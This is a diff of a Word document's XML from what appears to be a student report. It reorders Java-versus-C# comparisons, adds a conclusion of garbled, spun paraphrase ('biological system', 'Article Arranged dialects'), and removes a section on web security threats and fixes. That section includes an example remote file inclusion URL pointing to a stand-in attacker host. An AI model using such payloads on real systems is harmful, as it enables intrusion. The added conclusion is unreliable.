-        <w:t>It provides flexibility and simplicity for app development.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Lijstalinea"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="6"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Vue provides a list of tools and libraries such as official CLI, Development tools, Vue Router, State Management, and more.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Downsides of using Vue</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Lijstalinea"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="7"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Community support is not as wide as Angular and React</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Lijstalinea"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="7"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Limited number of plugin availability</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Kop2"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="5" w:name="_Toc114487653"/>
+      <w:bookmarkStart w:id="5" w:name="_Toc116304428"/>
       <w:r>
         <w:t>Conclusion</w:t>
       </w:r>
@@ -3748,7 +4033,7 @@
       <w:pPr>
         <w:pStyle w:val="Kop1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="6" w:name="_Toc114487654"/>
+      <w:bookmarkStart w:id="6" w:name="_Toc116304429"/>
       <w:r>
         <w:t>Backend framework</w:t>
       </w:r>
@@ -3892,8 +4177,20 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
+        <w:t>Key differences</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="10"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t>Key differences</w:t>
+        <w:t>Runtime Environment: Java runs on JRE (Java Runtime Environment), whereas C# runs on CLR (Common Language Runtime).</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3905,7 +4202,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Runtime Environment: Java runs on JRE (Java Runtime Environment), whereas C# runs on CLR (Common Language Runtime).</w:t>
+        <w:t>Programming Paradigm: Java is a strictly object-oriented language, whereas C# is object-oriented, functional, strongly typed, and component-oriented.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3917,7 +4214,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Programming Paradigm: Java is a strictly object-oriented language, whereas C# is object-oriented, functional, strongly typed, and component-oriented.</w:t>
+        <w:t>Operator Overloading: Java doesn't support operator overloading, whereas C# supports operator overloading for multiple operators.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3929,7 +4226,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Operator Overloading: Java doesn't support operator overloading, whereas C# supports operator overloading for multiple operators.</w:t>
+        <w:t>Pointers: Java does not support pointers, whereas C# supports pointers only in unsafe mode.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3941,18 +4238,6 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Pointers: Java does not support pointers, whereas C# supports pointers only in unsafe mode.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Lijstalinea"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="10"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
         <w:t>Arrays: Java arrays are a specialization of Object, while C# arrays are a specialization of System.</w:t>
       </w:r>
     </w:p>
@@ -3960,7 +4245,7 @@
       <w:pPr>
         <w:pStyle w:val="Kop2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="7" w:name="_Toc114487655"/>
+      <w:bookmarkStart w:id="7" w:name="_Toc116304430"/>
       <w:r>
         <w:t>C#</w:t>
       </w:r>
@@ -4144,7 +4429,7 @@
       <w:pPr>
         <w:pStyle w:val="Kop2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="8" w:name="_Toc114487656"/>
+      <w:bookmarkStart w:id="8" w:name="_Toc116304431"/>
       <w:r>
         <w:t>Java</w:t>
       </w:r>
@@ -4316,12 +4601,69 @@
       <w:pPr>
         <w:pStyle w:val="Kop2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="9" w:name="_Toc114487657"/>
+      <w:bookmarkStart w:id="9" w:name="_Toc116304432"/>
       <w:r>
         <w:lastRenderedPageBreak/>
+        <w:t>Conclusion</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="9"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Java has a huge and better biological system; its local area is continually developing, making new libraries, structures, and even instruments. New dialects in view of JVM are additionally arising, as Scala, Awesome and so on. It is additionally the principal language utilized by Google to create for Android, which is the biggest portable working framework. C#, then again, is utilized basically on the .NET structure, Mono, and other execution of CLI. Applications fabricated utilizing C# would work effectively on Microsoft-biological system; be that as it may, this element is being redesigned with the most recent apparatuses and libraries.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Java and C# have such countless contrasts, and likenesses, the language that one decides for improvement will rely to a great extent on the stage. One can look at an alternate part of Java and C# and ask what Java shows improvement over C# as well as the other way around? By the day's end, it is the choice in view of angle like - application stage, designer simplicity of language utilization, more fit libraries and necessity.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Both Java and C# is profoundly Article Arranged dialects giving different elements. Day's end, Java versus C# are instruments; a device is best when it fits the errand being finished and succeed when utilized by a decent designer. It's a choice in view of simplicity of utilization, application prerequisite and stage backing and support.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Source: </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId13" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:sz w:val="20"/>
+            <w:szCs w:val="20"/>
+          </w:rPr>
+          <w:t>https://www.educba.com/java-vs-c-sharp/</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Kop2"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="10" w:name="_Toc116304433"/>
+      <w:r>
         <w:t>Swearwords per backend framework</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="9"/>
+      <w:bookmarkEnd w:id="10"/>
     </w:p>
     <w:p/>
     <w:p>
@@ -4347,7 +4689,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId13">
+                    <a:blip r:embed="rId14">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -4385,25 +4727,25 @@
       <w:pPr>
         <w:pStyle w:val="Kop1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="10" w:name="_Toc114487658"/>
+      <w:bookmarkStart w:id="11" w:name="_Toc116304434"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Website security</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="10"/>
+      <w:bookmarkEnd w:id="11"/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Kop2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="11" w:name="_Toc114487659"/>
+      <w:bookmarkStart w:id="12" w:name="_Toc116304435"/>
       <w:r>
         <w:t>What is security</w:t>
       </w:r>
       <w:r>
         <w:t>?</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="11"/>
+      <w:bookmarkEnd w:id="12"/>
     </w:p>
     <w:p>
       <w:r>
@@ -4425,11 +4767,11 @@
       <w:pPr>
         <w:pStyle w:val="Kop2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="12" w:name="_Toc114487660"/>
+      <w:bookmarkStart w:id="13" w:name="_Toc116304436"/>
       <w:r>
         <w:t>Why do we need security?</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="12"/>
+      <w:bookmarkEnd w:id="13"/>
     </w:p>
     <w:p>
       <w:r>
@@ -4440,11 +4782,11 @@
       <w:pPr>
         <w:pStyle w:val="Kop3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="13" w:name="_Toc114487661"/>
+      <w:bookmarkStart w:id="14" w:name="_Toc116304437"/>
       <w:r>
         <w:t>Threats</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="13"/>
+      <w:bookmarkEnd w:id="14"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4457,1146 +4799,6 @@
     <w:p>
       <w:r>
         <w:t>SQL injection is a technique an attacker uses to exploit vulnerabilities in a database’s search process. With SQL injection, an attacker can obtain access to privileged information, create user permissions, modify permissions, or execute plans to change, manipulate, or destroy data. In this way, a hacker can capture sensitive information or alter it to interrupt or control the functioning of a crucial system.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Kop4"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Cross-site scripting</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Cross-site scripting (XSS) refers to a vulnerability that gives hackers an opening to insert client-side scripts inside a page. This is then used to gain access to critical data directly. XSS can also be used by a hacker to pretend to be another user or to fool a user into disclosing crucial information.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Kop4"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Remote File Inclusion</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>With remote file inclusion, an attacker references external scripts using vulnerabilities in a web application. The attacker can then attempt to use the referencing function within an application to upload malware. These types of malware are also referred to as backdoor shells. All this is done from a different Uniform Resource Locator (URL) within a separate domain.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Kop4"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Password Breach</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Breaching a user’s password is a common technique to gain access to web resources. In many cases, the hacker will use a password that the user or administrator had used to log in to another site for which the hacker has a list of login credentials.|</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-        <w:t>In other cases, hackers use a technique called password spraying, in which they use common passwords like "12345678" or "password123," and try them out one after the other until they gain access. There are several other techniques like keyloggers or simply finding your password written down and using it.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Kop4"/>
-      </w:pPr>
-      <w:r>
-        <w:lastRenderedPageBreak/>
-        <w:t>Code Injection</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Code injection involves an attacker using an input validation vulnerability in a computer’s software system to introduce and run malicious code. This code then proceeds to make changes to how the software and computer work.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Kop4"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Broken access control</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>This is a policy so that normal users cannot break the website with permissions they should not be allowed to use. Instead they should face an alert that says that they’re unauthorized to do this action.</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-        <w:t>This can be done by for example: parameter tampering in the URL or force browsing.</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-        <w:t>Accessing the API methods with missing access controls.</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-        <w:t>Manipulation of metadata when using a JSON web token.</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-        <w:t>CORS misconfiguration (Cross-Origin Resource Sharing)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Kop4"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Security Misconfiguration</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>The application may be vulnerable if it lacks certain security hardening on one or more components of the application or cloud service. Even if unnecessary features are on that should not (yet) be in production. A default admin account still enabled with default username and password. Sensitive error messages are still on, allowing a hacker to learn more about the systems.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Kop4"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Vulnerable and Outdated Components</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>We all have seen a website which has outdated plugins or core systems. These are more vulnerable to hackers if they know how to hack that version of the core system and/or plugin.</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-        <w:t>They will be left outdated if you don’t know the current version(s) and i</w:t>
-      </w:r>
-      <w:r>
-        <w:t>f you do not fix or upgrade the underlying platform, frameworks, and dependencies in a risk-based, timely fashion.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Kop4"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Identification and Authentication Failures</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>It is critical to confirm the users identity when authenticating for a login and/or register.</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> It protects against </w:t>
-      </w:r>
-      <w:r>
-        <w:t>authentication-related attacks</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>A data breach refers to when confidential or sensitive information gets exposed. Data breaches can sometimes happen by accident, but they are often perpetrated by hackers with the intention of using or selling the data.</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-        <w:t>Examples of attacks can be:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Lijstalinea"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="16"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Brute force attacks (on login)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Lijstalinea"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="16"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Default, or weak passwords (like admin or test123)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Lijstalinea"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="16"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Weak processes to recover a password</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> (lost password)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Lijstalinea"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="16"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Weakly hashed passwords or sensitive data</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Lijstalinea"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="16"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Session identifier explosion in URL</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Kop4"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Software and Data Integrity Failures</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>These type of failures can occur when a piece of software relies on plugins and/or libraries from untrusted sources. Pipelines, repositories can introduce potential unauthorized access.</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-        <w:t xml:space="preserve">Also, many libraries and plugins have an auto-update functionality build into them with insufficient verification and testing to apply to a running </w:t>
-      </w:r>
-      <w:r>
-        <w:t>piece of software.</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Kop4"/>
-      </w:pPr>
-      <w:r>
-        <w:lastRenderedPageBreak/>
-        <w:t>Security Logging and Monitoring Failures</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>By monitoring fails by uses in a software system it is easy to track down possible vulnerabilities in your system. With the following events, your system has a possibility to certain vulnerabilities.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Lijstalinea"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="18"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Audible events are not logged</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Lijstalinea"/>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="18"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Login</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Lijstalinea"/>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="18"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Login fails</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Lijstalinea"/>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="18"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>High value transactions</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Lijstalinea"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="18"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Warnings generate unclear messages</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Lijstalinea"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="18"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Logs of full-stack applications are not monitored for strange activity</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Lijstalinea"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="18"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Those logs are only stored locally</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Kop4"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Server-Side Request Forgery</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>These flaws occur when a web application is fetching some sort of remote source without validating the supplied URL by a user. This allows the attacker to force the application to send a handmade request to an unexpected destination. This flaw is becoming very severe due to the rise of cloud services.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Kop2"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="14" w:name="_Toc114487662"/>
-      <w:r>
-        <w:t>How do we fix these security flaws</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="14"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Kop4"/>
-      </w:pPr>
-      <w:r>
-        <w:t>SQL Injection</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>The following techniques can be used to prevent SQL injection</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Lijstalinea"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="19"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Use statements with parameters.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Lijstalinea"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="19"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Allow-list Input Validation</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">. </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Input validation should be applied on both syntactical and Semantic level.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Lijstalinea"/>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="19"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Syntactic validation should enforce correct syntax of structured field</w:t>
-      </w:r>
-      <w:r>
-        <w:t>s</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Lijstalinea"/>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="19"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Semantic validation should enforce correctness of their values in the specific business context</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Kop4"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Cross-site scripting</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">This </w:t>
-      </w:r>
-      <w:r>
-        <w:t>is a list of techniques to prevent or limit the impact of XSS. No single technique will solve XSS. Using the right combination of defensive techniques is necessary to prevent XSS.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Ensure that all variables go through validation and are then escaped or sanitized. Any variable that does not go through is a potential weakness.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Kop4"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Remote File Inclusion</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Most RFI attacks against websites are built on the server-side scripting language PHP. Although PHP is not the only means of RFI.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>http://yoursite.com/index.php?page=http://ev.il/badscript.php?</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>If the script on the victim server resembles the example from earlier, the server will execute the PHP include statement for the URL: http://ev.il/badscript.php?.html</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>To prevent this never use arbitrary input data in a literal file include request. Use a filter to thoroughly scrub input parameters against possible file inclusions. Build a dynamic whitelist.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Kop4"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Password Breach</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Be</w:t>
-      </w:r>
-      <w:r>
-        <w:t>low are some common safeguards</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> that can be used to prevent a password breach.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Implement an expiration on passwords so that users need to reset their password after a certain amount of days.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:lastRenderedPageBreak/>
-        <w:t>Enforce 2FA (2 factor authentication). This will add an extra layer of security when logging in.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Implement IP whitelisting so that employees can access their accounts only from that whitelisted IP address.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Implement logout timers. For example, auto-logout users that are logged in longer than 2 hours.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Kop4"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Broken access control</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Access control is only effective in trusted server-side code or server-less API, where the attacker cannot modify the access control check or metadata.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Lijstalinea"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="20"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Deny access to all private resources</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Lijstalinea"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="20"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Limit the rate that users can access calls to an API and controller.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Lijstalinea"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="20"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Add a control mechanism that can be re-used across the entire application preventing CORS.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Kop4"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Security Misconfiguration</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Without a concerted, repeatable application security configuration process, systems are at a higher risk.</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> The following list could help to prevent high risks.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Lijstalinea"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="21"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>A hardening process that is repeatable makes it fast and easy to deploy an environment that is very secure and locked down. This process should be automated to prevent taking the effort to set up a new secure environment.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Lijstalinea"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="21"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Remove or uninstall all unnecessary features, components etc that are in production.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Lijstalinea"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="21"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Review all configurations to all security updates and notes.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Kop4"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Vulnerable and Outdated Components</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>A patch management process should be in place to prevent risks.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Lijstalinea"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="22"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Remove unused dependencies, unnecessary features, components, files, and documentation.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Lijstalinea"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="22"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Continuously inventory the versions of both client-side and server-side components</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Lijstalinea"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="22"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Obtain libraries or plugins from official sources over secure links. Prefer that the packages are signed.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Lijstalinea"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="22"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Monitor all libraries and check when there are unmaintained ones.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Kop4"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Identification and Authentication Failures</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
